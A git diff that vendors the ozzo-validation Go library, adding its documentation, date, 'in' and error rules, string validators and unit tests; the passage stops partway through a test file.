+* `DNSName`: validates if a string is valid DNS name
+* `Host`: validates if a string is a valid IP (both v4 and v6) or a valid DNS name
+* `Port`: validates if a string is a valid port number
+* `MongoID`: validates if a string is a valid Mongo ID
+* `Latitude`: validates if a string is a valid latitude
+* `Longitude`: validates if a string is a valid longitude
+* `SSN`: validates if a string is a social security number (SSN)
+* `Semver`: validates if a string is a valid semantic version
+
+### Customizing Error Messages
+
+All built-in validation rules allow you to customize error messages. To do so, simply call the `Error()` method
+of the rules. For example,
+
+```go
+data := "2123"
+err := validation.Validate(data,
+	validation.Required.Error("is required"),
+	validation.Match(regexp.MustCompile("^[0-9]{5}$")).Error("must be a string with five digits"),
+)
+fmt.Println(err)
+// Output:
+// must be a string with five digits
+```
+
+
+## Creating Custom Rules
+
+Creating a custom rule is as simple as implementing the `validation.Rule` interface. The interface contains a single
+method as shown below, which should validate the value and return the validation error, if any:
+
+```go
+// Validate validates a value and returns an error if validation fails.
+Validate(value interface{}) error
+```
+
+If you already have a function with the same signature as shown above, you can call `validation.By()` to turn
+it into a validation rule. For example,
+
+```go
+func checkAbc(value interface{}) error {
+	s, _ := value.(string)
+	if s != "abc" {
+		return errors.New("must be abc")
+	}
+	return nil
+}
+
+err := validation.Validate("xyz", validation.By(checkAbc))
+fmt.Println(err)
+// Output: must be abc
+```
+
+
+### Rule Groups
+
+When a combination of several rules are used in multiple places, you may use the following trick to create a 
+rule group so that your code is more maintainable.
+
+```go
+var NameRule = []validation.Rule{
+	validation.Required,
+	validation.Length(5, 20),
+}
+
+type User struct {
+	FirstName string
+	LastName  string
+}
+
+func (u User) Validate() error {
+	return validation.ValidateStruct(&u,
+		validation.Field(&u.FirstName, NameRule...),
+		validation.Field(&u.LastName, NameRule...),
+	)
+}
+```
+
+In the above example, we create a rule group `NameRule` which consists of two validation rules. We then use this rule
+group to validate both `FirstName` and `LastName`.
+
+
+## Credits
+
+The `is` sub-package wraps the excellent validators provided by the [govalidator](https://github.com/asaskevich/govalidator) package.
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md b/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md
new file mode 100644
index 0000000000..8f11d03eaa
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md
@@ -0,0 +1,46 @@
+# Upgrade Instructions
+
+## Upgrade from 2.x to 3.x
+
+* Instead of using `StructRules` to define struct validation rules, use `ValidateStruct()` to declare and perform
+  struct validation. The following code snippet shows how to modify your code:
+```go
+// 2.x usage
+err := validation.StructRules{}.
+	Add("Street", validation.Required, validation.Length(5, 50)).
+	Add("City", validation.Required, validation.Length(5, 50)).
+	Add("State", validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))).
+	Add("Zip", validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))).
+	Validate(a)
+
+// 3.x usage
+err := validation.ValidateStruct(&a,
+	validation.Field(&a.Street, validation.Required, validation.Length(5, 50)),
+	validation.Field(&a.City, validation.Required, validation.Length(5, 50)),
+	validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))),
+	validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))),
+)
+```
+
+* Instead of using `Rules` to declare a rule list and use it to validate a value, call `Validate()` with the rules directly.
+```go
+data := "example"
+
+// 2.x usage
+rules := validation.Rules{
+	validation.Required,      
+	validation.Length(5, 100),
+	is.URL,                   
+}
+err := rules.Validate(data)
+
+// 3.x usage
+err := validation.Validate(data,
+	validation.Required,      
+	validation.Length(5, 100),
+	is.URL,                   
+)
+```
+
+* The default struct tags used for determining error keys is changed from `validation` to `json`. You may modify
+  `validation.ErrorTag` to change it back.
\ No newline at end of file
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/date.go b/vendor/github.com/go-ozzo/ozzo-validation/date.go
new file mode 100644
index 0000000000..2dc3d583ad
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/date.go
@@ -0,0 +1,84 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"errors"
+	"time"
+)
+
+type dateRule struct {
+	layout       string
+	min, max     time.Time
+	message      string
+	rangeMessage string
+}
+
+// Date returns a validation rule that checks if a string value is in a format that can be parsed into a date.
+// The format of the date should be specified as the layout parameter which accepts the same value as that for time.Parse.
+// For example,
+//    validation.Date(time.ANSIC)
+//    validation.Date("02 Jan 06 15:04 MST")
+//    validation.Date("2006-01-02")
+//
+// By calling Min() and/or Max(), you can let the Date rule to check if a parsed date value is within
+// the specified date range.
+//
+// An empty value is considered valid. Use the Required rule to make sure a value is not empty.
+func Date(layout string) *dateRule {
+	return &dateRule{
+		layout:       layout,
+		message:      "must be a valid date",
+		rangeMessage: "the data is out of range",
+	}
+}
+
+// Error sets the error message that is used when the value being validated is not a valid date.
+func (r *dateRule) Error(message string) *dateRule {
+	r.message = message
+	return r
+}
+
+// RangeError sets the error message that is used when the value being validated is out of the specified Min/Max date range.
+func (r *dateRule) RangeError(message string) *dateRule {
+	r.rangeMessage = message
+	return r
+}
+
+// Min sets the minimum date range. A zero value means skipping the minimum range validation.
+func (r *dateRule) Min(min time.Time) *dateRule {
+	r.min = min
+	return r
+}
+
+// Max sets the maximum date range. A zero value means skipping the maximum range validation.
+func (r *dateRule) Max(max time.Time) *dateRule {
+	r.max = max
+	return r
+}
+
+// Validate checks if the given value is a valid date.
+func (r *dateRule) Validate(value interface{}) error {
+	value, isNil := Indirect(value)
+	if isNil || IsEmpty(value) {
+		return nil
+	}
+
+	str, err := EnsureString(value)
+	if err != nil {
+		return err
+	}
+
+	date, err := time.Parse(r.layout, str)
+	if err != nil {
+		return errors.New(r.message)
+	}
+
+	if !r.min.IsZero() && r.min.After(date) || !r.max.IsZero() && date.After(r.max) {
+		return errors.New(r.rangeMessage)
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/date_test.go b/vendor/github.com/go-ozzo/ozzo-validation/date_test.go
new file mode 100644
index 0000000000..342f1addf8
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/date_test.go
@@ -0,0 +1,69 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestDate(t *testing.T) {
+	tests := []struct {
+		tag    string
+		layout string
+		value  interface{}
+		err    string
+	}{
+		{"t1", time.ANSIC, "", ""},
+		{"t2", time.ANSIC, "Wed Feb  4 21:00:57 2009", ""},
+		{"t3", time.ANSIC, "Wed Feb  29 21:00:57 2009", "must be a valid date"},
+		{"t4", "2006-01-02", "2009-11-12", ""},
+		{"t5", "2006-01-02", "2009-11-12 21:00:57", "must be a valid date"},
+		{"t6", "2006-01-02", "2009-1-12", "must be a valid date"},
+		{"t7", "2006-01-02", "2009-01-12", ""},
+		{"t8", "2006-01-02", "2009-01-32", "must be a valid date"},
+		{"t9", "2006-01-02", 1, "must be either a string or byte slice"},
+	}
+
+	for _, test := range tests {
+		r := Date(test.layout)
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestDateRule_Error(t *testing.T) {
+	r := Date(time.ANSIC)
+	assert.Equal(t, "must be a valid date", r.message)
+	assert.Equal(t, "the data is out of range", r.rangeMessage)
+	r.Error("123")
+	r.RangeError("456")
+	assert.Equal(t, "123", r.message)
+	assert.Equal(t, "456", r.rangeMessage)
+}
+
+func TestDateRule_MinMax(t *testing.T) {
+	r := Date(time.ANSIC)
+	assert.True(t, r.min.IsZero())
+	assert.True(t, r.max.IsZero())
+	r.Min(time.Now())
+	assert.False(t, r.min.IsZero())
+	assert.True(t, r.max.IsZero())
+	r.Max(time.Now())
+	assert.False(t, r.max.IsZero())
+
+	r2 := Date("2006-01-02").Min(time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC)).Max(time.Date(2020, 2, 1, 0, 0, 0, 0, time.UTC))
+	assert.Nil(t, r2.Validate("2010-01-02"))
+	err := r2.Validate("1999-01-02")
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "the data is out of range", err.Error())
+	}
+	err2 := r2.Validate("2021-01-02")
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "the data is out of range", err2.Error())
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/error.go b/vendor/github.com/go-ozzo/ozzo-validation/error.go
new file mode 100644
index 0000000000..d89d628573
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/error.go
@@ -0,0 +1,89 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"encoding/json"
+	"fmt"
+	"sort"
+)
+
+type (
+	// Errors represents the validation errors that are indexed by struct field names, map or slice keys.
+	Errors map[string]error
+
+	// InternalError represents an error that should NOT be treated as a validation error.
+	InternalError interface {
+		error
+		InternalError() error
+	}
+
+	internalError struct {
+		error
+	}
+)
+
+// NewInternalError wraps a given error into an InternalError.
+func NewInternalError(err error) InternalError {
+	return &internalError{error: err}
+}
+
+// InternalError returns the actual error that it wraps around.
+func (e *internalError) InternalError() error {
+	return e.error
+}
+
+// Error returns the error string of Errors.
+func (es Errors) Error() string {
+	if len(es) == 0 {
+		return ""
+	}
+
+	keys := []string{}
+	for key := range es {
+		keys = append(keys, key)
+	}
+	sort.Strings(keys)
+
+	s := ""
+	for i, key := range keys {
+		if i > 0 {
+			s += "; "
+		}
+		if errs, ok := es[key].(Errors); ok {
+			s += fmt.Sprintf("%v: (%v)", key, errs)
+		} else {
+			s += fmt.Sprintf("%v: %v", key, es[key].Error())
+		}
+	}
+	return s + "."
+}
+
+// MarshalJSON converts the Errors into a valid JSON.
+func (es Errors) MarshalJSON() ([]byte, error) {
+	errs := map[string]interface{}{}
+	for key, err := range es {
+		if ms, ok := err.(json.Marshaler); ok {
+			errs[key] = ms
+		} else {
+			errs[key] = err.Error()
+		}
+	}
+	return json.Marshal(errs)
+}
+
+// Filter removes all nils from Errors and returns back the updated Errors as an error.
+// If the length of Errors becomes 0, it will return nil.
+func (es Errors) Filter() error {
+	for key, value := range es {
+		if value == nil {
+			delete(es, key)
+		}
+	}
+	if len(es) == 0 {
+		return nil
+	}
+	return es
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/error_test.go b/vendor/github.com/go-ozzo/ozzo-validation/error_test.go
new file mode 100644
index 0000000000..e7ba9971bb
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/error_test.go
@@ -0,0 +1,70 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"errors"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestNewInternalError(t *testing.T) {
+	err := NewInternalError(errors.New("abc"))
+	if assert.NotNil(t, err.InternalError()) {
+		assert.Equal(t, "abc", err.InternalError().Error())
+	}
+}
+
+func TestErrors_Error(t *testing.T) {
+	errs := Errors{
+		"B": errors.New("B1"),
+		"C": errors.New("C1"),
+		"A": errors.New("A1"),
+	}
+	assert.Equal(t, "A: A1; B: B1; C: C1.", errs.Error())
+
+	errs = Errors{
+		"B": errors.New("B1"),
+	}
+	assert.Equal(t, "B: B1.", errs.Error())
+
+	errs = Errors{}
+	assert.Equal(t, "", errs.Error())
+}
+
+func TestErrors_MarshalMessage(t *testing.T) {
+	errs := Errors{
+		"A": errors.New("A1"),
+		"B": Errors{
+			"2": errors.New("B1"),
+		},
+	}
+	errsJSON, err := errs.MarshalJSON()
+	assert.Nil(t, err)
+	assert.Equal(t, "{\"A\":\"A1\",\"B\":{\"2\":\"B1\"}}", string(errsJSON))
+}
+
+func TestErrors_Filter(t *testing.T) {
+	errs := Errors{
+		"B": errors.New("B1"),
+		"C": nil,
+		"A": errors.New("A1"),
+	}
+	err := errs.Filter()
+	assert.Equal(t, 2, len(errs))
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "A: A1; B: B1.", err.Error())
+	}
+
+	errs = Errors{}
+	assert.Nil(t, errs.Filter())
+
+	errs = Errors{
+		"B": nil,
+		"C": nil,
+	}
+	assert.Nil(t, errs.Filter())
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/example_test.go b/vendor/github.com/go-ozzo/ozzo-validation/example_test.go
new file mode 100644
index 0000000000..c16face37e
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/example_test.go
@@ -0,0 +1,130 @@
+package validation_test
+
+import (
+	"fmt"
+	"regexp"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/go-ozzo/ozzo-validation/is"
+)
+
+type Address struct {
+	Street string
+	City   string
+	State  string
+	Zip    string
+}
+
+type Customer struct {
+	Name    string
+	Gender  string
+	Email   string
+	Address Address
+}
+
+func (a Address) Validate() error {
+	return validation.ValidateStruct(&a,
+		// Street cannot be empty, and the length must between 5 and 50
+		validation.Field(&a.Street, validation.Required, validation.Length(5, 50)),
+		// City cannot be empty, and the length must between 5 and 50
+		validation.Field(&a.City, validation.Required, validation.Length(5, 50)),
+		// State cannot be empty, and must be a string consisting of two letters in upper case
+		validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))),
+		// State cannot be empty, and must be a string consisting of five digits
+		validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))),
+	)
+}
+
+func (c Customer) Validate() error {
+	return validation.ValidateStruct(&c,
+		// Name cannot be empty, and the length must be between 5 and 20.
+		validation.Field(&c.Name, validation.Required, validation.Length(5, 20)),
+		// Gender is optional, and should be either "Female" or "Male".
+		validation.Field(&c.Gender, validation.In("Female", "Male")),
+		// Email cannot be empty and should be in a valid email format.
+		validation.Field(&c.Email, validation.Required, is.Email),
+		// Validate Address using its own validation rules
+		validation.Field(&c.Address),
+	)
+}
+
+func Example() {
+	c := Customer{
+		Name:  "Qiang Xue",
+		Email: "q",
+		Address: Address{
+			Street: "123 Main Street",
+			City:   "Unknown",
+			State:  "Virginia",
+			Zip:    "12345",
+		},
+	}
+
+	err := c.Validate()
+	fmt.Println(err)
+	// Output:
+	// Address: (State: must be in a valid format.); Email: must be a valid email address.
+}
+
+func Example_second() {
+	data := "example"
+	err := validation.Validate(data,
+		validation.Required,       // not empty
+		validation.Length(5, 100), // length between 5 and 100
+		is.URL, // is a valid URL
+	)
+	fmt.Println(err)
+	// Output:
+	// must be a valid URL
+}
+
+func Example_third() {
+	addresses := []Address{
+		{State: "MD", Zip: "12345"},
+		{Street: "123 Main St", City: "Vienna", State: "VA", Zip: "12345"},
+		{City: "Unknown", State: "NC", Zip: "123"},
+	}
+	err := validation.Validate(addresses)
+	fmt.Println(err)
+	// Output:
+	// 0: (City: cannot be blank; Street: cannot be blank.); 2: (Street: cannot be blank; Zip: must be in a valid format.).
+}
+
+func Example_four() {
+	c := Customer{
+		Name:  "Qiang Xue",
+		Email: "q",
+		Address: Address{
+			State: "Virginia",
+		},
+	}
+
+	err := validation.Errors{
+		"name":  validation.Validate(c.Name, validation.Required, validation.Length(5, 20)),
+		"email": validation.Validate(c.Name, validation.Required, is.Email),
+		"zip":   validation.Validate(c.Address.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))),
+	}.Filter()
+	fmt.Println(err)
+	// Output:
+	// email: must be a valid email address; zip: cannot be blank.
+}
+
+func Example_five() {
+	type Employee struct {
+		Name string
+	}
+
+	type Manager struct {
+		Employee
+		Level int
+	}
+
+	m := Manager{}
+	err := validation.ValidateStruct(&m,
+		validation.Field(&m.Name, validation.Required),
+		validation.Field(&m.Level, validation.Required),
+	)
+	fmt.Println(err)
+	// Output:
+	// Level: cannot be blank; Name: cannot be blank.
+}
\ No newline at end of file
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/in.go b/vendor/github.com/go-ozzo/ozzo-validation/in.go
new file mode 100644
index 0000000000..9673dd0ba7
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/in.go
@@ -0,0 +1,43 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import "errors"
+
+// In returns a validation rule that checks if a value can be found in the given list of values.
+// Note that the value being checked and the possible range of values must be of the same type.
+// An empty value is considered valid. Use the Required rule to make sure a value is not empty.
+func In(values ...interface{}) *inRule {
+	return &inRule{
+		elements: values,
+		message:  "must be a valid value",
+	}
+}
+
+type inRule struct {
+	elements []interface{}
+	message  string
+}
+
+// Validate checks if the given value is valid or not.
+func (r *inRule) Validate(value interface{}) error {
+	value, isNil := Indirect(value)
+	if isNil || IsEmpty(value) {
+		return nil
+	}
+
+	for _, e := range r.elements {
+		if e == value {
+			return nil
+		}
+	}
+	return errors.New(r.message)
+}
+
+// Error sets the error message for the rule.
+func (r *inRule) Error(message string) *inRule {
+	r.message = message
+	return r
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/in_test.go b/vendor/github.com/go-ozzo/ozzo-validation/in_test.go
new file mode 100644
index 0000000000..ad0c87be80
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/in_test.go
@@ -0,0 +1,44 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestIn(t *testing.T) {
+	var v int = 1
+	var v2 *int
+	tests := []struct {
+		tag    string
+		values []interface{}
+		value  interface{}
+		err    string
+	}{
+		{"t0", []interface{}{1, 2}, 0, ""},
+		{"t1", []interface{}{1, 2}, 1, ""},
+		{"t2", []interface{}{1, 2}, 2, ""},
+		{"t3", []interface{}{1, 2}, 3, "must be a valid value"},
+		{"t4", []interface{}{}, 3, "must be a valid value"},
+		{"t5", []interface{}{1, 2}, "1", "must be a valid value"},
+		{"t6", []interface{}{1, 2}, &v, ""},
+		{"t7", []interface{}{1, 2}, v2, ""},
+	}
+
+	for _, test := range tests {
+		r := In(test.values...)
+		err := r.Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func Test_inRule_Error(t *testing.T) {
+	r := In(1, 2, 3)
+	assert.Equal(t, "must be a valid value", r.message)
+	r.Error("123")
+	assert.Equal(t, "123", r.message)
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go b/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go
new file mode 100644
index 0000000000..ffbeef85b1
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/is/rules.go
@@ -0,0 +1,138 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+// Package is provides a list of commonly used string validation rules.
+package is
+
+import (
+	"regexp"
+	"unicode"
+
+	"github.com/asaskevich/govalidator"
+	"github.com/go-ozzo/ozzo-validation"
+)
+
+var (
+	// Email validates if a string is an email or not.
+	Email = validation.NewStringRule(govalidator.IsEmail, "must be a valid email address")
+	// URL validates if a string is a valid URL
+	URL = validation.NewStringRule(govalidator.IsURL, "must be a valid URL")
+	// RequestURL validates if a string is a valid request URL
+	RequestURL = validation.NewStringRule(govalidator.IsRequestURL, "must be a valid request URL")
+	// RequestURI validates if a string is a valid request URI
+	RequestURI = validation.NewStringRule(govalidator.IsRequestURI, "must be a valid request URI")
+	// Alpha validates if a string contains English letters only (a-zA-Z)
+	Alpha = validation.NewStringRule(govalidator.IsAlpha, "must contain English letters only")
+	// Digit validates if a string contains digits only (0-9)
+	Digit = validation.NewStringRule(isDigit, "must contain digits only")
+	// Alphanumeric validates if a string contains English letters and digits only (a-zA-Z0-9)
+	Alphanumeric = validation.NewStringRule(govalidator.IsAlphanumeric, "must contain English letters and digits only")
+	// UTFLetter validates if a string contains unicode letters only
+	UTFLetter = validation.NewStringRule(govalidator.IsUTFLetter, "must contain unicode letter characters only")
+	// UTFDigit validates if a string contains unicode decimal digits only
+	UTFDigit = validation.NewStringRule(govalidator.IsUTFDigit, "must contain unicode decimal digits only")
+	// UTFLetterNumeric validates if a string contains unicode letters and numbers only
+	UTFLetterNumeric = validation.NewStringRule(govalidator.IsUTFLetterNumeric, "must contain unicode letters and numbers only")
+	// UTFNumeric validates if a string contains unicode number characters (category N) only
+	UTFNumeric = validation.NewStringRule(isUTFNumeric, "must contain unicode number characters only")
+	// LowerCase validates if a string contains lower case unicode letters only
+	LowerCase = validation.NewStringRule(govalidator.IsLowerCase, "must be in lower case")
+	// UpperCase validates if a string contains upper case unicode letters only
+	UpperCase = validation.NewStringRule(govalidator.IsUpperCase, "must be in upper case")
+	// Hexadecimal validates if a string is a valid hexadecimal number
+	Hexadecimal = validation.NewStringRule(govalidator.IsHexadecimal, "must be a valid hexadecimal number")
+	// HexColor validates if a string is a valid hexadecimal color code
+	HexColor = validation.NewStringRule(govalidator.IsHexcolor, "must be a valid hexadecimal color code")
+	// RGBColor validates if a string is a valid RGB color in the form of rgb(R, G, B)
+	RGBColor = validation.NewStringRule(govalidator.IsRGBcolor, "must be a valid RGB color code")
+	// Int validates if a string is a valid integer number
+	Int = validation.NewStringRule(govalidator.IsInt, "must be an integer number")
+	// Float validates if a string is a floating point number
+	Float = validation.NewStringRule(govalidator.IsFloat, "must be a floating point number")
+	// UUIDv3 validates if a string is a valid version 3 UUID
+	UUIDv3 = validation.NewStringRule(govalidator.IsUUIDv3, "must be a valid UUID v3")
+	// UUIDv4 validates if a string is a valid version 4 UUID
+	UUIDv4 = validation.NewStringRule(govalidator.IsUUIDv4, "must be a valid UUID v4")
+	// UUIDv5 validates if a string is a valid version 5 UUID
+	UUIDv5 = validation.NewStringRule(govalidator.IsUUIDv5, "must be a valid UUID v5")
+	// UUID validates if a string is a valid UUID
+	UUID = validation.NewStringRule(govalidator.IsUUID, "must be a valid UUID")
+	// CreditCard validates if a string is a valid credit card number
+	CreditCard = validation.NewStringRule(govalidator.IsCreditCard, "must be a valid credit card number")
+	// ISBN10 validates if a string is an ISBN version 10
+	ISBN10 = validation.NewStringRule(govalidator.IsISBN10, "must be a valid ISBN-10")
+	// ISBN13 validates if a string is an ISBN version 13
+	ISBN13 = validation.NewStringRule(govalidator.IsISBN13, "must be a valid ISBN-13")
+	// ISBN validates if a string is an ISBN (either version 10 or 13)
+	ISBN = validation.NewStringRule(isISBN, "must be a valid ISBN")
+	// JSON validates if a string is in valid JSON format
+	JSON = validation.NewStringRule(govalidator.IsJSON, "must be in valid JSON format")
+	// ASCII validates if a string contains ASCII characters only
+	ASCII = validation.NewStringRule(govalidator.IsASCII, "must contain ASCII characters only")
+	// PrintableASCII validates if a string contains printable ASCII characters only
+	PrintableASCII = validation.NewStringRule(govalidator.IsPrintableASCII, "must contain printable ASCII characters only")
+	// Multibyte validates if a string contains multibyte characters
+	Multibyte = validation.NewStringRule(govalidator.IsMultibyte, "must contain multibyte characters")
+	// FullWidth validates if a string contains full-width characters
+	FullWidth = validation.NewStringRule(govalidator.IsFullWidth, "must contain full-width characters")
+	// HalfWidth validates if a string contains half-width characters
+	HalfWidth = validation.NewStringRule(govalidator.IsHalfWidth, "must contain half-width characters")
+	// VariableWidth validates if a string contains both full-width and half-width characters
+	VariableWidth = validation.NewStringRule(govalidator.IsVariableWidth, "must contain both full-width and half-width characters")
+	// Base64 validates if a string is encoded in Base64
+	Base64 = validation.NewStringRule(govalidator.IsBase64, "must be encoded in Base64")
+	// DataURI validates if a string is a valid base64-encoded data URI
+	DataURI = validation.NewStringRule(govalidator.IsDataURI, "must be a Base64-encoded data URI")
+	// CountryCode2 validates if a string is a valid ISO3166 Alpha 2 country code
+	CountryCode2 = validation.NewStringRule(govalidator.IsISO3166Alpha2, "must be a valid two-letter country code")
+	// CountryCode3 validates if a string is a valid ISO3166 Alpha 3 country code
+	CountryCode3 = validation.NewStringRule(govalidator.IsISO3166Alpha3, "must be a valid three-letter country code")
+	// DialString validates if a string is a valid dial string that can be passed to Dial()
+	DialString = validation.NewStringRule(govalidator.IsDialString, "must be a valid dial string")
+	// MAC validates if a string is a MAC address
+	MAC = validation.NewStringRule(govalidator.IsMAC, "must be a valid MAC address")
+	// IP validates if a string is a valid IP address (either version 4 or 6)
+	IP = validation.NewStringRule(govalidator.IsIP, "must be a valid IP address")
+	// IPv4 validates if a string is a valid version 4 IP address
+	IPv4 = validation.NewStringRule(govalidator.IsIPv4, "must be a valid IPv4 address")
+	// IPv6 validates if a string is a valid version 6 IP address
+	IPv6 = validation.NewStringRule(govalidator.IsIPv6, "must be a valid IPv6 address")
+	// DNSName validates if a string is valid DNS name
+	DNSName = validation.NewStringRule(govalidator.IsDNSName, "must be a valid DNS name")
+	// Host validates if a string is a valid IP (both v4 and v6) or a valid DNS name
+	Host = validation.NewStringRule(govalidator.IsHost, "must be a valid IP address or DNS name")
+	// Port validates if a string is a valid port number
+	Port = validation.NewStringRule(govalidator.IsPort, "must be a valid port number")
+	// MongoID validates if a string is a valid Mongo ID
+	MongoID = validation.NewStringRule(govalidator.IsMongoID, "must be a valid hex-encoded MongoDB ObjectId")
+	// Latitude validates if a string is a valid latitude
+	Latitude = validation.NewStringRule(govalidator.IsLatitude, "must be a valid latitude")
+	// Longitude validates if a string is a valid longitude
+	Longitude = validation.NewStringRule(govalidator.IsLongitude, "must be a valid longitude")
+	// SSN validates if a string is a social security number (SSN)
+	SSN = validation.NewStringRule(govalidator.IsSSN, "must be a valid social security number")
+	// Semver validates if a string is a valid semantic version
+	Semver = validation.NewStringRule(govalidator.IsSemver, "must be a valid semantic version")
+)
+
+var (
+	reDigit = regexp.MustCompile("^[0-9]+$")
+)
+
+func isISBN(value string) bool {
+	return govalidator.IsISBN(value, 10) || govalidator.IsISBN(value, 13)
+}
+
+func isDigit(value string) bool {
+	return reDigit.MatchString(value)
+}
+
+func isUTFNumeric(value string) bool {
+	for _, c := range value {
+		if unicode.IsNumber(c) == false {
+			return false
+		}
+	}
+	return true
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go b/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go
new file mode 100644
index 0000000000..7b332bbbf0
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go
@@ -0,0 +1,94 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package is
+
+import (
+	"testing"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/stretchr/testify/assert"
+)
+
+func TestAll(t *testing.T) {
+	tests := []struct {
+		tag            string
+		rule           validation.Rule
+		valid, invalid string
+		err            string
+	}{
+		{"Email", Email, "test@example.com", "example.com", "must be a valid email address"},
+		{"URL", URL, "http://example.com", "examplecom", "must be a valid URL"},
+		{"RequestURL", RequestURL, "http://example.com", "examplecom", "must be a valid request URL"},
+		{"RequestURI", RequestURI, "http://example.com", "examplecom", "must be a valid request URI"},
+		{"Alpha", Alpha, "abcd", "ab12", "must contain English letters only"},
+		{"Digit", Digit, "123", "12ab", "must contain digits only"},
+		{"Alphanumeric", Alphanumeric, "abc123", "abc.123", "must contain English letters and digits only"},
+		{"UTFLetter", UTFLetter, "ａｂｃ", "１２３", "must contain unicode letter characters only"},
+		{"UTFDigit", UTFDigit, "１２３", "ａｂｃ", "must contain unicode decimal digits only"},
+		{"UTFNumeric", UTFNumeric, "１２３", "ａｂｃ.１２３", "must contain unicode number characters only"},
+		{"UTFLetterNumeric", UTFLetterNumeric, "ａｂｃ１２３", "ａｂｃ.１２３", "must contain unicode letters and numbers only"},
+		{"LowerCase", LowerCase, "ａｂc", "Aｂｃ", "must be in lower case"},
+		{"UpperCase", UpperCase, "ABC", "ABｃ", "must be in upper case"},
+		{"IP", IP, "74.125.19.99", "74.125.19.999", "must be a valid IP address"},
+		{"IPv4", IPv4, "74.125.19.99", "2001:4860:0:2001::68", "must be a valid IPv4 address"},
+		{"IPv6", IPv6, "2001:4860:0:2001::68", "74.125.19.99", "must be a valid IPv6 address"},
+		{"MAC", MAC, "0123.4567.89ab", "74.125.19.99", "must be a valid MAC address"},
+		{"DNSName", DNSName, "example.com", "abc%", "must be a valid DNS name"},
+		{"Host", Host, "example.com", "abc%", "must be a valid IP address or DNS name"},
+		{"Port", Port, "123", "99999", "must be a valid port number"},
+		{"Latitude", Latitude, "23.123", "100", "must be a valid latitude"},
+		{"Longitude", Longitude, "123.123", "abc", "must be a valid longitude"},
+		{"SSN", SSN, "100-00-1000", "100-0001000", "must be a valid social security number"},
+		{"Semver", Semver, "1.0.0", "1.0.0.0", "must be a valid semantic version"},
+		{"ISBN", ISBN, "1-61729-085-8", "1-61729-085-81", "must be a valid ISBN"},
+		{"ISBN10", ISBN10, "1-61729-085-8", "1-61729-085-81", "must be a valid ISBN-10"},
+		{"ISBN13", ISBN13, "978-4-87311-368-5", "978-4-87311-368-a", "must be a valid ISBN-13"},
+		{"UUID", UUID, "a987fbc9-4bed-3078-cf07-9141ba07c9f1", "a987fbc9-4bed-3078-cf07-9141ba07c9f3a", "must be a valid UUID"},
+		{"UUIDv3", UUIDv3, "b987fbc9-4bed-3078-cf07-9141ba07c9f3", "b987fbc9-4bed-4078-cf07-9141ba07c9f3", "must be a valid UUID v3"},
